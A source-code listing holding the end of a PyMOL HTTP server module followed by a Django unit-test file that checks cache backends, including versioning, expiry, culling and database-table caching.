self.server.wrap_natives = wrap_natives
if self.port == 0:
self.port = self.server.socket.getsockname()[1]
self.server.pymol_session = self.session
self.server.pymol_root = self.root
if self.root is not None:
os.environ['PYMOL_HTTP_ROOT'] = self.root
self.server.pymol_cmd = self.cmd
self.server.pymol_logging = logging
def _server_thread(self):
while not self.stop_event.isSet():
self.server.handle_request()
def start(self):
print ( " PyMOL-HTTPd: serving requests on http://localhost:%d" %
self.port )
t = threading.Thread(target=self._server_thread)
t.setDaemon(1)
self.stop_event.clear()
t.start()
def stop(self):
if not self.stop_event.isSet():
self.stop_event.set()
try: # create a request in order to release the handler
urlopen("http://localhost:%d" % self.port)
except:
pass
self.server.socket.close()
def quit(self):
self.stop_event.set()
def expose(self, name, value):
'''
exposes a Python method or symbol to the web services interface
'''
self.session[name] = value
# default behavior if run explicitly from PyMOL
if __name__ == 'pymol': # launched inside PyMOL
# initialize the server
server = PymolHttpd()
# handle_requests (fires off a separate thread)
server.start()
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import copy
import os
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import connection, connections
from django.http import HttpRequest, HttpResponse, StreamingHttpResponse
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
override_settings,
)
from django.test.signals import setting_changed
from django.utils import six, timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control,
patch_response_headers, patch_vary_headers,
)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
from .models import Poll, expensive_calculation
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpickable(object):
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = {k: base.copy() for k in _caches_setting_base.keys()}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
'''
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertEqual(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
Passing in zero into timeout results in a value that is not cached
'''
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count = count + 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def test_invalid_keys(self):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached does not allow whitespace or control characters in keys
cache.set('key with spaces', 'value')
self.assertEqual(len(w), 2)
self.assertIsInstance(w[0].message, CacheKeyWarning)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached limits key length to 250
cache.set('a' * 251, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
finally:
cache.key_func = old_func
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1']),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertDictEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2']),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3']),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertDictEqual(cache.get_many(['ford4', 'arthur4']),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpickable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.add('unpickable', Unpickable())
def test_set_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.set('unpickable', Unpickable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
def test_get_or_set_version(self):
cache.get_or_set('brian', 1979, version=2)
with self.assertRaisesMessage(ValueError, 'You need to specify a value.'):
cache.get_or_set('brian')
with self.assertRaisesMessage(ValueError, 'You need to specify a value.'):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super calls needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = six.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
